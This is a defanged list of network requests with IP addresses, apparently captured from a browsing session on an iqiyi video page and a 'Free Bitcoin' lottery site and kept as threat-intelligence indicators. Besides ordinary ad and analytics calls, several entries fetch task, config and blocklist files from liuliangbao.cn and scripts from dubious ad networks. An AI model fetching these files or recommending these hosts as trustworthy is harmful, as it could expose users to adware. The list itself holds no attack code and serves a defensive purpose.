hxxp://anycast-europe.quantserve.com.akadns.net/pixel;r=995029119;a=p-pV8razYeGyZwj;fpan=0;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=
hxxp://api.geetest.com/refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ecii&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143579	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ec6q&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143640	198.11.176.80
hxxp://cltres.liuliangbao.cn/clt/config/GlobalConfig_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js	173.194.113.205
hxxp://static.iqiyi.com/js/player_v1/pcweb.wonder.js
hxxp://edge.quantserve.com/quant.js	212.30.134.161
hxxp://cltres.liuliangbao.cn/clt/config/cfg_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_helkJjAewu65OsBLgXRnmTvc3AVFJ-nBZMBU9KtqCZLcy-AbNWPYbf7GmNI2lEK32K0VG9tOWibFGYRxkdwLZs5Z_dpN_c2yorTnWLFwdrSIdgMAMNTUw9-xMvBUaHYCIPzc6pDoco1r_7AkBO7zWbf-wMIKHXW9-KGCLr2eNRdOXZFm96vsDuT6fi5nGdSRbTIXyUNUHw5PAioQCMVkoQplfyQWGcuT8fsDo6aV3YKw5o9EnGZ8z8EJoHWXYsHF8mFFwAQx4F1XtsLGWJS-OiGzF9KGKQmrCd_NuB4fMXjbIsdGYDd50APKO2_iqR3Qp5xUWJB2hTbvkbU7C0R1d1TNpcFply462Nm5gG0IbFXACnMqE3nLLbIwETMolAEJR8&v=404&seq=7	106.39.169.66
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=load&prgr=0&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.22120652068406343	106.38.219.49
hxxp://px.3.cn/prices/mgets?skuids=J_10263952097,J_1014668736,J_1712213997,J_1683079458,J_10481689014,J_2823639,J_10293479220,J_2631300,J_1002498991,J_10666538087,J_1612802959,J_1319192906,J_10654177939,J_1767125187,J_10292956874,J_1311634685,J_10608382784,J_1031724397&type=1&callback=dsp_1484906111088&r=1484906111107	111.206.230.21
hxxp://static.iqiyi.com/js/lib/sea1.2.js
hxxp://msg.71.am/tmpstats.gif?type=piaoshhtestmayttf&des=find_Q_ready&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1238272289	106.38.219.49
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=vrld&vms=1&tl=2539&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.12644612696021795	106.38.219.49
hxxp://pagead2.googlesyndication.com/pagead/js/r20170116/r20170110/show_ads_impl.js	173.194.113.205
hxxp://b.scorecardresearch.com/b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=	217.212.238.42
hxxp://pixel.quantserve.com/pixel;r=1302890811;a=p-pV8razYeGyZwj;fpan=1;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=	95.172.94.59
hxxp://static.iqiyi.com/js/pingback/iwt.js
hxxp://irs01.com/crossdomain.xml	139.219.132.210
hxxp://nl.notice.iqiyi.com/apis/msg/hasnew.action?count=5&agent_type=1&callback=window.Q.__callbacks__.cb3onixz	222.173.56.34
hxxp://nlwl.iqiyi.com/apis/urc/getqd?authcookie=null&containsUgc=1&agent_type=1&subTypes=1,7,9&channelIds=1,2&callback=window.Q.__callbacks__.cbji48aq	123.125.111.85
hxxp://msg.71.am/cp2.gif?ps=0&h=0&ri=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&oi=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&p=i&s=1484906115563&di=0:n1,88,5000000911968,:1000000005931;&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://app.cointraffic.in/js/pnd2/script.packed.js	37.0.25.88
hxxp://msg.71.am/jpb.gif?rdm=1738841934&qtcurl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&rfr=&lrfr=DIRECT&jsuid=o5rodndzg8of8s4mwfefai5c&qtsid=1484906110,1484906110,1484906110,1&ppuid=&platform=11&fcode=&ffcode=&coop=&weid=11d91127a84babbf6dabdf9e702b5f03&pru=&fvcode=&mod=cn_s&tmplt=bodantplt&flshuid=5088e17771f6d54476f95dc61f9e80b4&as=c6ef95c1f39a49124dae509aae8e1a88	106.38.219.49
hxxp://t7z.cupid.iqiyi.com/crossdomain.xml	101.227.200.11
hxxp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	116.207.117.87
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9	106.39.169.66
hxxp://www.google-analytics.com/analytics.js	172.217.20.174
hxxp://static.trafficjunky.net/js/marketplace.min.js	205.185.208.85
hxxp://static.iqiyi.com/js/common/52ba69c7b1d54420bec46c52cec587c6.js
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he9IK0zj-LilCRyIGNw1kitd8XCIJu4Ib482Juro__479AUxpU8Df2fi-fQzKtSBnuwH-MVzd9FU8gOZlxlgfuwhfXAH7eBcC4JPMuv7GPXIy5H6gl9t1AHhoBDab6lSrK2hGmB9VSACPHoeXmattKj2FxyzAvW-kl6pOZ9FECT3hiXOWmOEGWzBFFP7FEgw2XkdeskaSCWNzoJUvCYRix5cGUhpe-tJkLjG3b6cWv6BLpg0FSYhNA6_xbdlUStbXW_eT7FI2G2829RaOJ4Cg2UNe5vaswjY5D6nGwYjrdWrFbZcKjkLM8sjUk0cn6CyI6rdSkdq2ECosvv9Tk13C4xfcX4ALs1iT1psPlXO0Zun2sMkJbvIKg5Q3SUwTvcH-b&v=404&seq=6	106.39.169.66
hxxp://static-alias-1.360buyimg.com/jzt/temp/js/_J.1.2.min.js	192.229.133.187
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22346699	106.11.93.16
hxxp://msg.71.am/b?t=21&u=5088e17771f6d54476f95dc61f9e80b4&pu=null&pf=1&bstp=24_dmfc&p2=1011&qpid=572044000&aid=0&block=1409011_dm&p=10&p1=101&_=2134069781	106.38.219.49
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=1070368555&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AAgAAEAAI~&jid=181594928&cid=150513197.1484906118&tid=UA-70454598-1&_r=1&z=1010198880	172.217.20.174
hxxp://irs01.com/irt?_iwt_id=null&_iwt_UA=UA-iqiyi-100009&jsonp=SetIDA0&_iwt_p1=A-0-0&_iwt_p2=572044000&_iwt_p3=56-0-0-0&_iwt_p4=787ab6983c8a883fa3c5190ce3cac804&_iwt_p5=&_iwt_muid=5088e17771f6d54476f95dc61f9e80b4&r=5889	139.219.132.210
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heEnmDgzEgJtbifhOVPNJDZL6mH1RGK8un5EUb_9dOg2LZm5QrA9b6KN-vXxSfzlPcMjoWBWB2Qi4sH93q7P68fKkAAFjL92af8brD9oOnSmt21L8iRmx_VVVc5QzQnuJiLqMVVudbR0NjyzLkTwqwEXN4scuxPw9hAirzu5jtOf4jwortaew7ipPMC0QuHuM33WD46Le0Ah331azG5hFqVzyu30AH1QsCnIPhwy44crCrLdRkmS6JAgqn-ZsgEAAXZsn4spVbueuUvN5eqLh_fEhs6XE-Aj-rUVIQhXt8o8OCExHVX9CCAPXguqrBMbysrUEQySUQPfJa6J5KiRS7hgjReGDX_6K_HenD3hEg7_xIRqfNClH-V7eA5dXazejC&v=404&seq=3	106.39.169.66
hxxp://cltres.liuliangbao.cn/clt/config/blhash_6.5.dat.zip	61.153.110.5
hxxp://www.onlylady.com/files/onlyladyomd_new2.php	37.29.13.39
hxxp://www.iqiyi.com/player/cupid/common/clear.swf?r=xv1v5n
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=activeplay&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.4783940138295293	106.38.219.49
hxxp://t7z.cupid.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU0QPA19QcQMeBAcWVWIEBxZXUwtARThFDQEWXAxtAQQEAQAGQVJ5Xw0AFkBeYgEWQEAPBlcTLAwAFkBGDG4XQQ1IWwxAU28BAAAAAAFvBAMGHlFCS1NkS1kKAQABbwEAAAICBkdQbx1TRAoACiVYCgECAgZBU28BAAAAAwhzUkQKAglMGFluAQAAAAABbwEAAAYCGhIXZQELSlkKAG8BAAACAgZBU2wDARxTRAtvF0NGDwEYR1BxARZFXA1ZK0VACh0dQQYUcVhBWUlZHzxeXR9EbQdIES1QA1pEBwFxWURdXhRATFN5R1VZVA0IZ1cDVgIKAkJaPAcIUwlSBGhTAwUAAlBBVWYHVlICUxcoDAAWSw8G&h=1484906114377&s=8f6f04431c47096fdb4b10b9161f986a	101.227.200.11
hxxp://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=140707adinit&pla=11&mod=cn_s&tn=0.23817403800785542	106.38.219.49
hxxp://static-alias-1.360buyimg.com/jzt/libs/behavior/v2/behavior.js	192.229.133.187
hxxp://cache.video.qiyi.com/sci/gm/3/572044000/?src=1702633101b340d8917a69cf8a4b8c7c	106.38.219.21
hxxp://static.iqiyi.com/js/qiyiV2/ugcBodanPlay_ver.js?3leiavi
hxxp://cltres.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://adspaces.ero-advertising.com/banads/view.php?spaceid=2168566
hxxp://mixer.video.iqiyi.com/jp/mixin/videos/572044000?callback=window.Q.__callbacks__.cbae6bg&status=1	106.38.219.21
hxxp://msg.71.am/vpb.gif?flag=stuenv&plyrver=3.3.12.9&pla=11&os=Windows 7&browser=MSIE&dpi=1276X846&flashver=WIN 23,0,0,185&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.4808125551789999	106.38.219.49
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he4eNkbQAXSVjSzyFW81pDZ1LQvRk0CVy9J18PeJAbVVt-IMC1Zl8l1WjWIKsObHQmfGpfbZyKbox8daLfvnzv-6kCE7nnFtZ3paiDX_-ZsB8MuOjgvFxwEQr8ayg0miQDuoxxxoh7E4Gd6pZxmF9AGchxt3FyQ8IGgTXhFf4aSOO2YdX2qGA5tfgMvXwz7YD21LeOReOWn5in9ya3T5q9mXTvU4J_aADuR2ne1UtxV3ZpKoaYgF0LScgRk1v50wpzWtQUBhjCXsPr2gs89m6NGFVIVT1MXAW1ITtUq2JnutP1epFGIuAh8bpninXTA140cE_nlxrycHwdZYnlyJfnsELu7IoeclyYRYdr2Z8s7RKZmdOeYrJ7saFdudE3V1Rj&v=404&seq=5	106.39.169.66
hxxp://msg.71.am/vpb.gif?flag=startvisits&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.2609360576607287	106.38.219.49
hxxp://www.google-analytics.com/collect?v=1&_v=j47&a=634634703&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AACAAEAAI~&jid=&cid=150513197.1484906118&tid=UA-70454598-1&z=2073781349	172.217.20.174
hxxp://nsclick.baidu.com/v.gif?pid=324&qiyi_cookie=&t=1484906112271	115.239.211.92
hxxp://static.iqiyi.com/js/qiyiV2/20170119180153/common/common.js
hxxp://static.iqiyi.com/js/common/ares2.min.js?1484906115570
hxxp://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf
hxxp://static.iqiyi.com/js/player_v1/config/online.js
hxxp://data.video.qiyi.com/uid?tn=0.4324387479573488	222.173.57.193
hxxp://js.passport.qihucdn.com/11.0.1.js?fa1c7fce79127597cbed202ea98aec2c	87.245.198.83
hxxp://static.geetest.com/static/js/geetest.0.0.0.js	198.11.176.80
hxxp://b.scorecardresearch.com/b?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=	217.212.238.42
hxxp://static.iqiyi.com/crossdomain.xml
hxxp://s2.qhimg.com/static/ab77b6ea7f3fbf79.js	52.222.174.9
hxxp://www.iqiyi.com/common/flashplayer/20161122/182321793893.swf
hxxp://atanx.alicdn.com/t/tanxssp.js?_v=12	195.27.31.250
hxxp://b.scorecardresearch.com/b?c1=1&c2=7290408&c3=10&c4=11&c5=&c6=&c7=http://www.iqiyi.com/v_19rra3jt70.html&c8=&c9=&c10=&c11=5088e17771f6d54476f95dc61f9e80b4	217.212.238.42
hxxp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	116.207.117.87
hxxp://data.video.qiyi.com/uid?tn=0.016473443247377872	222.173.57.193
hxxp://push.zhanzhang.baidu.com/push.js	61.135.162.21
hxxp://data.video.qiyi.com/uid?tn=0.896643178537488	222.173.57.193
hxxp://cache.video.qiyi.com/crossdomain.xml	106.38.219.21
hxxp://msg.71.am/cp2.gif?ps=0&rd=1170&h=0&p=s&rc=1&s=1484906115563&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://meta.video.qiyi.com/20161122/3a/3c/0ad38a6488686acc96d4ec67497a33b9.xml?tn=0.09199875919148326	2.21.89.89
hxxp://www.iqiyi.com/player/cupid/common/clear.swf?r=6yuxxr
hxxp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback	106.39.169.66
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hemtZz9E4T5Ml0FxIsOi7b9e6CUfixrWj0zyePKODPs2fGk99YKgmd96V7bd6iaxaASWVta4Uw2mVxa4JJOvd72JpgyGS2PR8XsdZpL87BcDLqEmShyhjsRfsafQQCZPFA_hKVZqjQdX3ELYetFcbXVAqCVOv1PdrOCh9nJwGQ_nznrRLps1ozknMgd89vuQqyu2i2zBsgyoqwlq3M2Ei-nUNOiBXoVGinGT2gWsz02E60z1_fh9cnGM_ZO7FTFH5ur-yg7X3l5JNppNRnOcHHgQMIr1IchhqvYCJpDCaDLQ8X-7NyDg5ouL6a6ILIEXLFe7KV8Q7Jc_-mR7kLuhqxXj3OZDFLEZECiJ1zoySaZfcuRvd5f3QK8YEjeW6nSRRe&v=404&seq=4	106.39.169.66
hxxp://hm.baidu.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&et=0&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=1570361624&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1&tt=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º	220.181.7.190
hxxp://t7z.cupid.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU1MPBlcAOwwAFlNGDGofAx4AHAJGRTsMABZVUQxuF1dEDwMQHV5vF14NABZBMAwBFkJAC0FFL0INABZAR2IAFkEPUUJLUnlCRg0DHgdsHwAWR14LGRcrQQofH0dGKB9ZQVtLX18AMFwfRm8BCC1DUQNYRgFBTTdFXVwWRgxvF0ZVW1YLSFs5AlYACAQCZlIGCFELVERUPQIFAgBWAWkIBlZQAFVXFGIBFkkNAA==&h=1484906112411&s=60d34018ac24eb58180b7eb57af7bbf5	101.227.200.11
hxxp://s.360.cn/so/zz.gif?url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&sid=fa1c7fce79127597cbed202ea98aec2c&token=feaq1ccc7qfkcrer79911=2t7s5i9l7?	180.163.251.231
hxxp://static.geetest.com/static/golden/style.3.2.0.css	198.11.176.80
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=ready&purl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&vvfrmtp=manclick&rfr=&lrfr=DIRECT&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.8087925375439227	106.38.219.49
hxxp://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heyLT0pUyDiycWLTHdeJJaAdRT4maqHQLm9Y0AoCVAtZFJmB0rLnPKe4Awt6Yb-DkFjW8GmYsoqfjuDFyd-_33gEKpi2PHNuN-K8WV-zOdz9qxfzUr9BQGPFQ71MpT1UOK20_jRDH2XBUi6uJfEYhV9I3WMZWOKqr8vXvqhXEwLNLQk2B9X7RuULD4wZcA4WJD7s9GaHjd_JwDEtxobOrxX2D8KGBYiZSpTER0cZ8YEvjn2jqHCVe-dJp14Mc2F6Zszm6zwTXyROtTHpyWjCtYpY1kQe_wR-fcV_vEag-5GxfIq3O9uZYW4SQvx94a1YipoLuLAFXviTZpLe_1WYbMdepAHZNPONGVwjzQqaL89TcPXZiM0TCTEI1-H1A-2ljb&v=404&seq=2	106.39.169.66
hxxp://www.qiyipic.com/common/fix/default_player_16_9.png?arg=01000011010000000000	2.21.89.72
hxxp://search.video.qiyi.com/m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b	124.192.153.77
hxxp://msg.71.am/b?t=20&p=10&p1=101&pf=1&block=B&r=&pu=null&u=5088e17771f6d54476f95dc61f9e80b4&jsuid=o5rodndzg8of8s4mwfefai5c&ce=11d91127a84babbf6dabdf9e702b5f03&re=1504*175629&clkx=0&clky=0&mod=cn_s&tm=8205&tmplt=dianshijunewtmplt&qpid=572044000&rseat=608241_cls_default&_=1166079991	106.38.219.49
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hebtboSJ6LnIVrJSLFTFAor6VibSw4roh9pVbMZp9UcE8uIoVcWJijeAaMqIiza0gk14gOAuJt5BfBvNg_B0OM4DdUu5kuIzf2jvfzxWGhvqSoIXIN5Zsxd5XfxO6X9nF8C6KTWUFOCcu2k-Y_sjHFjrhTRV5VyRzvC3wmInmnXYGXJTZIdnAjyfzOhwuYrGE8d_t79q2bd1hawuJc__CcDSM4Vqm-MSDgNPASm8mE09PgVXumdj8hkrzimh_Rd2RRvNxxus369cMbtIMMIcIvTvF_Ru1wbI9R7YfGziPepiLZu9Sl1LX_rGaA3-bqb_BcQFWaNWM1rqad5eXbrCMtxvTHnL6i2KVYpZpKCKZbOUMhYuHYOuvjDcPqd0w1NRwx&v=404&seq=8	106.39.169.66
hxxp://msg.71.am/cp2.gif?ps=0&h=0&p=i&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://freemomboy.com/trade	198.255.112.250
hxxp://www.qiyipic.com/crossdomain.xml	2.21.89.72
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heAb1y8zHhESL05A9jqTN-_xcs6r_ygqa3471hOG2sKfIoo7D2VlowD6Maz-72y8SXfViIdJoaCoS_HPHWJSJDgiGrhcZWBxoUmZ9yyAUMmAo_4aO-ZoVQIQcqIq-yVmKRLtJco4qPxA4XtzpCIBjYyorLiBoLIAbbhd5F0JwLQyDI1lcJyYG-HWtHsKJeo7I1r0b8QXL_sw_iYZQsMnHbXby88qZA7AezNilyO5VjcFnX2hpHyuTKOGiqqeXNKCrRPxeulH-BdCgVIuHM5x2gT2GaRlDqGb8cKpM6du77WlaXoBegrJBDJ8tLBQr2k7TWUMtFrguvyHrXDYXGCSbDyvKIMa_aNdiw8xJyZcXWxfc9Gnr6sRGca4wBnDoeinYT&v=404&seq=1	106.39.169.66
hxxp://cache.video.qiyi.com/vms?key=fvip&src=1702633101b340d8917a69cf8a4b8c7c&tvId=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&vinfo=1&tm=952&qyid=&puid=&authKey=bc6811ba189dbccef005d66f72770de2&um=0&pf=b6c13e26323c537d&thdk=&thdt=&rs=1&k_tag=1&qdx=n&qdv=2&vf=746cf15c43ca5b06081b3fa8a82442b0	106.38.219.21
hxxp://msg.71.am/tmpstats.gif?type=piaoshhtestmayttf&job=ugcbodanplay&des=findpagebyjob&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&entry=Q.load&prj=qiyiV2&_=1776244267	106.38.219.49
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=sunkuotest&tn=1484906108169&yhls=1573105147225&fuid=&juid=&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201&ver=&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1484906108170	106.38.219.49
hxxp://cltres.liuliangbao.cn/clt/config/bl_6.5.dat?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://msg.video.qiyi.com/vodpb.gif?url=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&tag=done&curl=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&useTime=1154&dur=5644	36.110.220.15
hxxp://up.video.iqiyi.com/ugc-updown/quud.do?dataid=572044000&type=2&userid=&flashuid=5088e17771f6d54476f95dc61f9e80b4&appID=21&callback=window.Q.__callbacks__.cbrokkg9	123.125.111.84
hxxp://cltres.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://b.scorecardresearch.com/beacon.js	217.212.238.42
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=jingyitest1&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&ver=WIN 23,0,0,185&yhls=1485764902188&pla=11&mod=cn_s&tn=0.6147289201617241	106.38.219.49
hxxp://www.iqiyi.com/common/flashplayer/20170119/1050c72eeb6.swf
hxxp://www.iqiyi.com/common/flashplayer/20161122/1823925a82d4.swf
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22608113	106.11.93.16
hxxp://cache.video.qiyi.com/jp/vi/572044000/787ab6983c8a883fa3c5190ce3cac804/?status=1&callback=window.Q.__callbacks__.cb2r2oc2	106.38.219.21
hxxp://static.iqiyi.com/js/qiyiV2/20170119180153/jobs/pc/ugcBodanPlay.js
hxxp://cmts.iqiyi.com/crossdomain.xml	119.188.145.8
hxxp://mixer.video.iqiyi.com/jp/recommend/videos?referenceId=572044000&albumId=0&cookieId=o5rodndzg8of8s4mwfefai5c&channelId=10&withRefer=false&area=swan&size=10&type=video&trimUser=false&pru=&playPlatform=PC_QIYI&callback=window.Q.__callbacks__.cbg39tfk	106.38.219.21
hxxp://static.iqiyi.com/js/pingback/qa.js
